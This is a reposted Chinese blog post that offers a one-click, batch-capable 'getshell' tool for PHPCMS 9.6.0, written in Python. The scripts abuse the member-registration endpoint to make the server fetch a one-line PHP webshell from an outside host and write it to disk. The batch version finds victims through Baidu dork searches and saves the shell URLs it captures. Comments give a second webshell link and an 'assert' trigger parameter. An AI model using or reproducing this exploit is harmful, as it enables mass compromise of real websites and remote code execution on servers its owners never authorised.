介紹

• 一鍵化python 1.py http://xxx.com,如果是批量直接運行py文件即可

待辦

• [] 加入對有驗證碼phpcms網站的支持
• [] 加入批量(已完成)

說明

依賴庫的安裝pip install requests

代碼

# -*- coding:utf-8 -*-''' ---------------------- Author : Akkuman Blog : hacktech.cn ---------------------- '''import requests import sys from random import Randomchars = 'qwertyuiopasdfghjklzxcvbnm0123456789'def main():if len(sys.argv) < 2:print("[*]Usage : Python 1.py http://xxx.com")sys.exit()host = sys.argv[1]url = host + "/index.php?m=member&c=index&a=register&siteid=1"data = {"siteid": "1","modelid": "1","username": "dsakkfaffdssdudi","password": "123456","email": "dsakkfddsjdi@qq.com",# 如果想使用回調的可以使用http://file.codecat.one/oneword.txt，一句話地址為.php后面加上e=YXNzZXJ0"info[content]": "<img src=http://file.codecat.one/normalOneWord.txt?.php#.jpg>","dosubmit": "1","protocol": "",}try:rand_name = chars[Random().randint(0, len(chars) - 1)]data["username"] = "akkuman_%s" % rand_namedata["email"] = "akkuman_%s@qq.com" % rand_namehtmlContent = requests.post(url, data=data)successUrl = ""if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:successUrl = htmlContent.text[htmlContent.text.index("http"):htmlContent.text.index(".php")] + ".php"print("[*]Shell : %s" % successUrl)if successUrl == "":print("[x]Failed : had crawled all possible url, but i can't find out it. So it's failed.\n")except:print("Request Error")if __name__ == '__main__':main()

批量

# -*- coding:utf-8 -*-''' ---------------------- Author : Akkuman Blog : hacktech.cn ---------------------- '''import requests from bs4 import BeautifulSoup # from urlparse import unquote //Python2 # from urlparse import urlparse //Python2 from urllib.parse import quote from urllib.parse import urlparse from random import Randomchars = 'qwertyuiopasdfghjklzxcvbnm0123456789'headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" }def parseBaidu(keyword, pagenum):keywordsBaseURL = 'https://www.baidu.com/s?wd=' + str(quote(keyword)) + '&oq=' + str(quote(keyword)) + '&ie=utf-8' + '&pn='pnum = 0while pnum <= int(pagenum):baseURL = keywordsBaseURL + str(pnum*10)try:request = requests.get(baseURL, headers=headers)soup = BeautifulSoup(request.text, "html.parser")for a in soup.select('div.c-container > h3 > a'):url = requests.get(a['href'], headers=headers).urlyield urlexcept:yield Nonefinally:pnum += 1def saveShell(shellUrl):with open("webShell.txt","a+") as f:f.write("[*]%s\n" % shellUrl)def main():data = {"siteid": "1","modelid": "1","username": "akkumandsad","password": "123456","email": "akkakkumafa@qq.com",# 如果想使用回調的可以使用http://file.codecat.one/oneword.txt，一句話地址為.php后面加上e=YXNzZXJ0,普通一句話http://file.codecat.one/normalOneWord.txt"info[content]": "<img src=http://7xusrl.com1.z0.glb.clouddn.com/bypassdog.txt?.php#.jpg>","dosubmit": "1","protocol": "",}for crawlUrl in parseBaidu("inurl:index.php?m=member&c=index&a=register&siteid=1", 10):try:if crawlUrl:rand_name = chars[Random().randint(0, len(chars) - 1)]data["username"] = "akkuman_%s" % rand_namedata["email"] = "akkuman_%s@qq.com" % rand_namehost = urlparse(crawlUrl).scheme + "://" + urlparse(crawlUrl).hostnameurl = host + "/index.php?m=member&c=index&a=register&siteid=1"htmlContent = requests.post(url, data=data, timeout=10)successUrl = ""if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:successUrl = htmlContent.text[htmlContent.text.index("http"):htmlContent.text.index(".php")] + ".php"print("[*]Shell : %s" % successUrl)saveShell(successUrl)if successUrl == "":print("[x]Failed : Failed to getshell.")else:continueexcept:print("Request Error")if __name__ == '__main__':main()

測試圖

單個

批量

下載地址

代碼下載地址

轉載于:https://www.cnblogs.com/Akkuman/p/6963148.html

總結

以上是生活随笔為你收集整理的phpcms9-6-0 一键getshell工具的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。